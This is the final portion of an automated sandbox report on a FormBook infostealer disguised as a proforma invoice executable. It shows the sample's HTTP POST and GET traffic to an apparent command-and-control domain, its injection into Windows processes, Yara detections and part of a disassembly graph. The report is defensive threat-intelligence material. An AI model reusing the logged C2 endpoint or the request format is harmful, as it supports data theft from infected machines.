                                                                                                                  Data Raw: 62 56 3d 49 47 32 35 56 54 46 35 52 72 45 44 68 78 38 2f 33 79 75 54 36 65 49 34 76 5a 48 68 63 75 68 50 79 62 77 45 31 2f 46 61 5a 69 56 7a 2b 6d 6b 41 64 62 79 77 74 32 6f 48 70 49 38 49 2b 63 46 36 49 36 44 62 30 37 6e 69 50 69 77 57 70 79 61 54 39 38 57 2f 47 31 76 53 46 48 70 30 73 68 78 65 45 4c 44 58 34 30 52 41 41 7a 30 4f 5a 76 4f 65 63 42 74 56 38 73 53 39 50 55 42 35 35 57 59 5a 54 70 71 77 4d 43 42 61 39 43 5a 77 62 73 6d 65 71 4c 76 7a 7a 42 35 48 31 2f 73 48 66 50 55 2b 38 62 52 66 35 70 75 70 65 39 7a 47 35 33 4f 38 6c 4f 45 77 30 30 55 4d 41 7a 42 36 4d 63 58 70 50 73 62 65 76 50 43 6b 63 41 73 63 37 7a 39 70 6c 2f 4b 52 42 32 43 50 44 70 4a 5a
                                                                                                                  Data Ascii: bV=IG25VTF5RrEDhx8/3yuT6eI4vZHhcuhPybwE1/FaZiVz+mkAdbywt2oHpI8I+cF6I6Db07niPiwWpyaT98W/G1vSFHp0shxeELDX40RAAz0OZvOecBtV8sS9PUB55WYZTpqwMCBa9CZwbsmeqLvzzB5H1/sHfPU+8bRf5pupe9zG53O8lOEw00UMAzB6McXpPsbevPCkcAsc7z9pl/KRB2CPDpJZ
                                                                                                                  Dec 2, 2024 15:26:49.854129076 CET1098INHTTP/1.1 404 Not Found
                                                                                                                  Date: Mon, 02 Dec 2024 14:26:49 GMT
                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SafWd9HfBOJymYdjoJB712v%2Fy6PkvH8BrDlPy9nQ1Cl%2BnX28Tamxy4nEadM3QzsA8TVLUwG6WD1vrpVcEbjlu%2FuN7ud6VHj10Az9jLyhtZPoQRrhnzG%2Fk%2FWqG0hT2UkL10uPJKY2b44%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8ebbfe8279eff5f7-EWR
                                                                                                                  Content-Encoding: gzip
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1691&min_rtt=1691&rtt_var=845&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=794&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a
                                                                                                                  Data Ascii: e5LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8b*
                                                                                                                  Dec 2, 2024 15:26:49.855145931 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  47192.168.2.550023172.67.167.14680728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:26:51.019052982 CET1811OUTPOST /8gp4/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 1239
                                                                                                                  Connection: close
                                                                                                                  Host: www.rgenerousrs.store
                                                                                                                  Origin: http://www.rgenerousrs.store
                                                                                                                  Referer: http://www.rgenerousrs.store/8gp4/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 49 47 32 35 56 54 46 35 52 72 45 44 68 78 38 2f 33 79 75 54 36 65 49 34 76 5a 48 68 63 75 68 50 79 62 77 45 31 2f 46 61 5a 69 4e 7a 2b 51 77 41 50 4b 79 77 73 32 6f 48 33 34 38 4e 2b 63 46 72 49 2b 76 66 30 37 36 58 50 67 49 57 34 6b 6d 54 74 4a 32 2f 4d 31 76 53 4b 6e 70 31 78 52 77 63 45 4b 7a 54 34 30 42 41 41 7a 30 4f 5a 74 47 65 4c 44 46 56 76 63 53 79 66 6b 42 31 39 57 59 69 54 70 79 67 4d 43 55 74 68 69 35 77 59 4d 32 65 76 35 33 7a 37 42 35 46 79 2f 73 66 66 50 51 68 38 61 39 39 35 6f 71 48 65 2f 54 47 35 43 6d 72 2b 50 41 6f 32 45 78 70 4e 52 31 41 4d 36 48 4a 50 4f 47 76 69 6f 36 6a 5a 6b 41 6f 37 30 39 6b 6d 4d 2f 2b 41 77 4f 62 4d 74 6b 48 30 71 72 34 68 4c 79 54 43 6b 62 6e 31 59 43 64 6c 34 64 69 52 4d 53 33 4e 4f 35 6c 46 52 4f 6b 6d 38 32 72 63 77 31 66 55 72 4e 7a 6b 63 77 71 70 65 53 65 30 45 59 6c 63 41 43 69 2f 56 79 48 46 75 63 49 75 66 47 38 6a 65 4e 73 65 46 74 48 46 68 65 54 4e 31 37 6a 4b 38 72 59 63 36 45 31 33 55 74 61 48 61 4b 44 78 33 42 4f 77 44 69 69 2b 51 51 [TRUNCATED]
                                                                                                                  Data Ascii: bV=IG25VTF5RrEDhx8/3yuT6eI4vZHhcuhPybwE1/FaZiNz+QwAPKyws2oH348N+cFrI+vf076XPgIW4kmTtJ2/M1vSKnp1xRwcEKzT40BAAz0OZtGeLDFVvcSyfkB19WYiTpygMCUthi5wYM2ev53z7B5Fy/sffPQh8a995oqHe/TG5Cmr+PAo2ExpNR1AM6HJPOGvio6jZkAo709kmM/+AwObMtkH0qr4hLyTCkbn1YCdl4diRMS3NO5lFROkm82rcw1fUrNzkcwqpeSe0EYlcACi/VyHFucIufG8jeNseFtHFheTN17jK8rYc6E13UtaHaKDx3BOwDii+QQ0x6xxXUl0SPXgV1o14z4C+50ozlJ4NSTrrL/dp84cXA7XhES8JWJFqmpOfojOoRUTva0KEMkS1PpMV/5p6/5WEc4EeUO88W7rOME5CFGYkOG/5KkrqsGk1Q+wMrg6EoXIqx/1fV2WGjZOm8kqQUiAFHcyPlb/t/GS8sov0RxuqCtLu+kzrEsaeIMgdASPymLUSKHEfu/1Ycnhs0ffIXQJO7I2dE4vlL3ngi06o0xWMsbpvHCgyswz9b/cNIuwIlAkigXt8QV4ii8mkE2rUyZnTkEfXGofeJCYqe2e9FQZBmDYHarXIMWwAeCVzdoGZhJSBbBGaPd4A1Ex3gcW6xMQ4/5T6heKe19Iv9Tw3s2XvGW+/FA6kUauuDabLwHNt224NII/gQ/oNRd0rWPULyEnyRqs7jPkroFjU8Lf80ew+w3JX7fm6uMUPDd6Kz/Fj3CWl0MAu6gDKbj1ecwi+A05cFG+0Pqhm2Opp1VbN9N/rIP3xyKRR6eiy2v3zFSuUSeLXTH7h1+uOIwggLyt7wjO9z/1ksQxMlsoOSzE0YbdW6DlGuYFsx3RZImoL00ZMs+8vE3YNzmapMT6CJs464NkDhmDt5YPCc+H4MMG/8W100SEdjo9Q3Lcf0OWol9nEpkKPKB4htRaByjvtF/MNgsP0AC3b9Ok31jQ9 [TRUNCATED]
                                                                                                                  Dec 2, 2024 15:26:52.517781973 CET1104INHTTP/1.1 404 Not Found
                                                                                                                  Date: Mon, 02 Dec 2024 14:26:52 GMT
                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eLqNiMYY1ux9mYEQfcHVl7N%2FI4UrRyMKGZ5llvJ9iBA6ZCO%2Bqe3t%2BfOb76vYEfFkDW3yK3ClLINxBWm4UFkZAabfNKsJ7q%2FkWlKL5IyiO1ODG2REysVk%2FQzJPfwsaRqWn8yXEM7M1Ks%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8ebbfe931d1e42e8-EWR
                                                                                                                  Content-Encoding: gzip
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1777&min_rtt=1777&rtt_var=888&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1811&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: e5LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8b*0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  48192.168.2.550024172.67.167.14680728C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 2, 2024 15:26:53.704754114 CET502OUTGET /8gp4/?bV=FEeZWlhMd48ysDs290a5kdk4wKu/Usks8a8x1+EEc0Vq+hoQB7y77HQo5oow9pdvGKqyyoz5OAo+pUm014OHEU2GNEJ4iSl/EJTCwnsfNhVKTNH/IB8Mre+zSk1Y9E9ALA==&wzcP=iLdd HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Connection: close
                                                                                                                  Host: www.rgenerousrs.store
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Dec 2, 2024 15:26:55.200845957 CET1118INHTTP/1.1 404 Not Found
                                                                                                                  Date: Mon, 02 Dec 2024 14:26:55 GMT
                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LEc2f3RJZfHySdKuuKhrzrNmxVGOIJAoIJyqvgP%2Bmxeylgr%2BltjfD%2BMdg5J7HcRCQaW5EwPAMf34fJLufWrUzS5PUU1pZg6tnFDhp%2BjiwQ0kvtj6eSHQQkhv3%2FDLTrcJED5LFQDk%2F7g%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8ebbfea3fa417d24-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1790&min_rtt=1790&rtt_var=895&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=502&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 31 31 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 67 65 6e 65 72 6f 75 73 72 73 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 119<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.rgenerousrs.store Port 80</address></body></html>0


                                                                                                                  Statistics

                                                                                                                  CPU Usage

                                                                                                                  Click to jump to process

                                                                                                                  Memory Usage

                                                                                                                  Click to jump to process

                                                                                                                  High Level Behavior Distribution

                                                                                                                  Click to dive into process behavior distribution

                                                                                                                  Behavior

                                                                                                                  Click to jump to process

                                                                                                                  System Behavior

                                                                                                                  General

                                                                                                                  Target ID:0
                                                                                                                  Start time:09:22:53
                                                                                                                  Start date:02/12/2024
                                                                                                                  Path:C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe"
                                                                                                                  Imagebase:0x250000
                                                                                                                  File size:1'207'808 bytes
                                                                                                                  MD5 hash:A4C3A56E6258EA94065BF7151009D43C
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:2
                                                                                                                  Start time:09:22:53
                                                                                                                  Start date:02/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\Desktop\Proforma invoice - Arancia NZ.exe"
                                                                                                                  Imagebase:0x600000
                                                                                                                  File size:46'504 bytes
                                                                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2297054463.0000000003200000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2296706560.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2298090586.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:4
                                                                                                                  Start time:09:23:14
                                                                                                                  Start date:02/12/2024
                                                                                                                  Path:C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe"
                                                                                                                  Imagebase:0x30000
                                                                                                                  File size:140'800 bytes
                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4469588528.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:5
                                                                                                                  Start time:09:23:16
                                                                                                                  Start date:02/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\waitfor.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\SysWOW64\waitfor.exe"
                                                                                                                  Imagebase:0xfc0000
                                                                                                                  File size:32'768 bytes
                                                                                                                  MD5 hash:E58E152B44F20DD099C5105DE482DF24
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4469589553.0000000000CB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4468208787.0000000000820000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4469517194.0000000000C60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:low
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:6
                                                                                                                  Start time:09:23:29
                                                                                                                  Start date:02/12/2024
                                                                                                                  Path:C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe"
                                                                                                                  Imagebase:0x30000
                                                                                                                  File size:140'800 bytes
                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:8
                                                                                                                  Start time:09:23:41
                                                                                                                  Start date:02/12/2024
                                                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                  Imagebase:0x7ff79f9e0000
                                                                                                                  File size:676'768 bytes
                                                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Disassembly

                                                                                                                  Reset < >

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:3.5%
                                                                                                                    Dynamic/Decrypted Code Coverage:0.4%
                                                                                                                    Signature Coverage:10%
                                                                                                                    Total number of Nodes:2000
                                                                                                                    Total number of Limit Nodes:166
                                                                                                                    execution_graph 100995 251055 101000 252649 100995->101000 101010 257667 101000->101010 101004 252754 101006 25105a 101004->101006 101018 253416 59 API calls 2 library calls 101004->101018 101007 272d40 101006->101007 101064 272c44 101007->101064 101009 251064 101019 270db6 101010->101019 101012 257688 101013 270db6 Mailbox 59 API calls 101012->101013 101014 2526b7 101013->101014 101015 253582 101014->101015 101057 2535b0 101015->101057 101018->101004 101021 270dbe 101019->101021 101022 270dd8 101021->101022 101024 270ddc std::exception::exception 101021->101024 101029 27571c 101021->101029 101046 2733a1 DecodePointer 101021->101046 101022->101012 101047 27859b RaiseException 101024->101047 101026 270e06 101048 2784d1 58 API calls _free 101026->101048 101028 270e18 101028->101012 101030 275797 101029->101030 101034 275728 101029->101034 101055 2733a1 DecodePointer 101030->101055 101032 27579d 101056 278b28 58 API calls __getptd_noexit 101032->101056 101036 275733 101034->101036 101037 27575b RtlAllocateHeap 101034->101037 101040 275783 101034->101040 101044 275781 101034->101044 101052 2733a1 DecodePointer 101034->101052 101036->101034 101049 27a16b 58 API calls __NMSG_WRITE 101036->101049 101050 27a1c8 58 API calls 5 library calls 101036->101050 101051 27309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 101036->101051 101037->101034 101038 27578f 101037->101038 101038->101021 101053 278b28 58 API calls __getptd_noexit 101040->101053 101054 278b28 58 API calls __getptd_noexit 101044->101054 101046->101021 101047->101026 101048->101028 101049->101036 101050->101036 101052->101034 101053->101044 101054->101038 101055->101032 101056->101038 101058 2535bd 101057->101058 101059 2535a1 101057->101059 101058->101059 101060 2535c4 RegOpenKeyExW 101058->101060 101059->101004 101060->101059 101061 2535de RegQueryValueExW 101060->101061 101062 253614 RegCloseKey 101061->101062 101063 2535ff 101061->101063 101062->101059 101063->101062 101065 272c50 __getstream 101064->101065 101072 273217 101065->101072 101071 272c77 __getstream 101071->101009 101089 279c0b 101072->101089 101074 272c59 101075 272c88 DecodePointer DecodePointer 101074->101075 101076 272c65 101075->101076 101077 272cb5 101075->101077 101086 272c82 101076->101086 101077->101076 101135 2787a4 59 API calls __cftoa_l 101077->101135 101079 272d18 EncodePointer EncodePointer 101079->101076 101080 272cc7 101080->101079 101081 272cec 101080->101081 101136 278864 61 API calls 2 library calls 101080->101136 101081->101076 101084 272d06 EncodePointer 101081->101084 101137 278864 61 API calls 2 library calls 101081->101137 101084->101079 101085 272d00 101085->101076 101085->101084 101138 273220 101086->101138 101090 279c2f EnterCriticalSection 101089->101090 101091 279c1c 101089->101091 101090->101074 101096 279c93 101091->101096 101093 279c22 101093->101090 101120 2730b5 58 API calls 3 library calls 101093->101120 101097 279c9f __getstream 101096->101097 101098 279cc0 101097->101098 101099 279ca8 101097->101099 101107 279ce1 __getstream 101098->101107 101124 27881d 58 API calls 2 library calls 101098->101124 101121 27a16b 58 API calls __NMSG_WRITE 101099->101121 101101 279cad 101122 27a1c8 58 API calls 5 library calls 101101->101122 101104 279cd5 101105 279cdc 101104->101105 101106 279ceb 101104->101106 101125 278b28 58 API calls __getptd_noexit 101105->101125 101110 279c0b __lock 58 API calls 101106->101110 101107->101093 101108 279cb4 101123 27309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 101108->101123 101112 279cf2 101110->101112 101114 279d17 101112->101114 101115 279cff 101112->101115 101127 272d55 101114->101127 101126 279e2b InitializeCriticalSectionAndSpinCount 101115->101126 101118 279d0b 101133 279d33 LeaveCriticalSection _doexit 101118->101133 101121->101101 101122->101108 101124->101104 101125->101107 101126->101118 101128 272d5e RtlFreeHeap 101127->101128 101129 272d87 _free 101127->101129 101128->101129 101130 272d73 101128->101130 101129->101118 101134 278b28 58 API calls __getptd_noexit 101130->101134 101132 272d79 GetLastError 101132->101129 101133->101107 101134->101132 101135->101080 101136->101081 101137->101085 101141 279d75 LeaveCriticalSection 101138->101141 101140 272c87 101140->101071 101141->101140 101142 277c56 101143 277c62 __getstream 101142->101143 101179 279e08 GetStartupInfoW 101143->101179 101145 277c67 101181 278b7c GetProcessHeap 101145->101181 101147 277cbf 101148 277cca 101147->101148 101264 277da6 58 API calls 3 library calls 101147->101264 101182 279ae6 101148->101182 101151 277cd0 101152 277cdb __RTC_Initialize 101151->101152 101265 277da6 58 API calls 3 library calls 101151->101265 101203 27d5d2 101152->101203 101155 277cea 101156 277cf6 GetCommandLineW 101155->101156 101266 277da6 58 API calls 3 library calls 101155->101266 101222 284f23 GetEnvironmentStringsW 101156->101222 101159 277cf5 101159->101156 101162 277d10 101163 277d1b 101162->101163 101267 2730b5 58 API calls 3 library calls 101162->101267 101232 284d58 101163->101232 101166 277d21 101167 277d2c 101166->101167 101268 2730b5 58 API calls 3 library calls 101166->101268 101246 2730ef 101167->101246 101170 277d34 101171 277d3f __wwincmdln 101170->101171 101269 2730b5 58 API calls 3 library calls 101170->101269 101252 2547d0 101171->101252 101174 277d53 101175 277d62 101174->101175 101270 273358 58 API calls _doexit 101174->101270 101271 2730e0 58 API calls _doexit 101175->101271 101178 277d67 __getstream 101180 279e1e 101179->101180 101180->101145 101181->101147 101272 273187 36 API calls 2 library calls 101182->101272 101184 279aeb 101273 279d3c InitializeCriticalSectionAndSpinCount __getstream 101184->101273 101186 279af4 101274 279b5c 61 API calls 2 library calls 101186->101274 101187 279af0 101187->101186 101275 279d8a TlsAlloc 101187->101275 101190 279af9 101190->101151 101191 279b06 101191->101186 101192 279b11 101191->101192 101276 2787d5 101192->101276 101195 279b53 101284 279b5c 61 API calls 2 library calls 101195->101284 101198 279b32 101198->101195 101200 279b38 101198->101200 101199 279b58 101199->101151 101283 279a33 58 API calls 4 library calls 101200->101283 101202 279b40 GetCurrentThreadId 101202->101151 101204 27d5de __getstream 101203->101204 101205 279c0b __lock 58 API calls 101204->101205 101206 27d5e5 101205->101206 101207 2787d5 __calloc_crt 58 API calls 101206->101207 101209 27d5f6 101207->101209 101208 27d661 GetStartupInfoW 101211 27d676 101208->101211 101214 27d7a5 101208->101214 101209->101208 101210 27d601 @_EH4_CallFilterFunc@8 __getstream 101209->101210 101210->101155 101211->101214 101215 2787d5 __calloc_crt 58 API calls 101211->101215 101218 27d6c4 101211->101218 101212 27d86d 101298 27d87d LeaveCriticalSection _doexit 101212->101298 101214->101212 101216 27d7f2 GetStdHandle 101214->101216 101217 27d805 GetFileType 101214->101217 101297 279e2b InitializeCriticalSectionAndSpinCount 101214->101297 101215->101211 101216->101214 101217->101214 101218->101214 101219 27d6f8 GetFileType 101218->101219 101296 279e2b InitializeCriticalSectionAndSpinCount 101218->101296 101219->101218 101223 277d06 101222->101223 101224 284f34 101222->101224 101228 284b1b GetModuleFileNameW 101223->101228 101299 27881d 58 API calls 2 library calls 101224->101299 101226 284f70 FreeEnvironmentStringsW 101226->101223 101227 284f5a _memmove 101227->101226 101229 284b4f _wparse_cmdline 101228->101229 101231 284b8f _wparse_cmdline 101229->101231 101300 27881d 58 API calls 2 library calls 101229->101300 101231->101162 101233 284d69 101232->101233 101235 284d71 